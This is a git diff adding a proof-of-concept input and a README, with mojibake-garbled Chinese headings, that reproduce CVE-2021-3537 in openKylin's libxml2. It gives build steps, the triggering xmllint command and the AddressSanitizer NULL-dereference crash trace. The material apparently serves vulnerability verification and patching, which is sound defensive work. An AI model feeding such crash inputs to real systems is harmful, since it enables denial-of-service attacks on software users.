diff --git a/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc new file mode 100644 index 0000000000000000000000000000000000000000..83fe4f1b70b8550c37c50d3820965dc2b7b4ce31 --- /dev/null +++ b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc @@ -0,0 +1,23 @@ +<:> + + + + + +<÷ßóELEMEÿÿ<:> + + + + + +<]@? \ No newline at end of file diff --git a/cve/libxml2/2021/CVE-2021-3537/README.md b/cve/libxml2/2021/CVE-2021-3537/README.md new file mode 100644 index 0000000000000000000000000000000000000000..56b1d0999fab7d8732416f7e42e4d1400aefc78f --- /dev/null +++ b/cve/libxml2/2021/CVE-2021-3537/README.md @@ -0,0 +1,118 @@ +## æ¼æ´žéªŒè¯ +### 下载æºç  +https://gitee.com/openkylin/libxml2 (版本:2.9.10+dfsg-ok1) + +### 编译 +```bash +$ cd libxml2 +#下载编译ä¾èµ– +$ sudo apt install libicu-dev liblzma-dev libpython3-all-dbg libpython3-all-dev pkg-config python3-all-dbg python3-all-dev rename zlib1g-dev +#å¼€å¯-ggdb -fsanitize=address +$ CFLAGS="-ggdb -fsanitize=address" ./configure +#编译 +$ make +``` + +### æ¼æ´žå¤çŽ° +```bash +$ ./xmllint --recover --postvalid ../CVE/CVE-2021-3537-poc +../CVE/CVE-2021-3537-poc:1: parser error : xmlParseDocTypeDecl : no DOCTYPE name ! +' +:(<:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : ContentDecl : Name or '(' expected +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : internal error: xmlParseInternalSubset: error detected in Markup declaration + +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : DOCTYPE improperly terminated +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: namespace error : Failed to parse QName ':' +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:11: parser error : Couldn't find end of Start Tag YPE line 11 +<:> + ^ +../CVE/CVE-2021-3537-poc:23: parser error : StartTag: invalid element name +<]@? + ^ +../CVE/CVE-2021-3537-poc:23: parser error : EndTag: '<]@? + ^ +output error : string is not in UTF-8 + + +]> +<:> + + + + + +<:> + + + + + +]@? +AddressSanitizer:DEADLYSIGNAL +================================================================= +==18011==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f16b52bdd80 bp 0x7ffe22b96a50 sp 0x7ffe22b96920 T0) +==18011==The signal is caused by a READ memory access. +==18011==Hint: address points to the zero page. + #0 0x7f16b52bdd7f in xmlValidBuildAContentModel /data1/libxml2-openkylin-yangtze/valid.c:729 + #1 0x7f16b52bebc7 in xmlValidBuildContentModel__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:839 + #2 0x7f16b52d0c69 in xmlValidateElementContent /data1/libxml2-openkylin-yangtze/valid.c:5330 + #3 0x7f16b52d4ab6 in xmlValidateOneElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6234 + #4 0x7f16b52d61c3 in xmlValidateElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6479 + #5 0x7f16b52d8893 in xmlValidateDocument__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6942 + #6 0x564d2e3c2703 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2799 + #7 0x564d2e3c8cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728 + #8 0x7f16b4f7c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) + #9 0x564d2e3b8aed in _start (/data1/libxml2-openkylin-yangtze/.libs/xmllint+0xfaed) + +AddressSanitizer can not provide additional info. +SUMMARY: AddressSanitizer: SEGV /data1/libxml2-openkylin-yangtze/valid.c:729 in xmlValidBuildAContentModel +==18011==ABORTING +``` \ No newline at end of file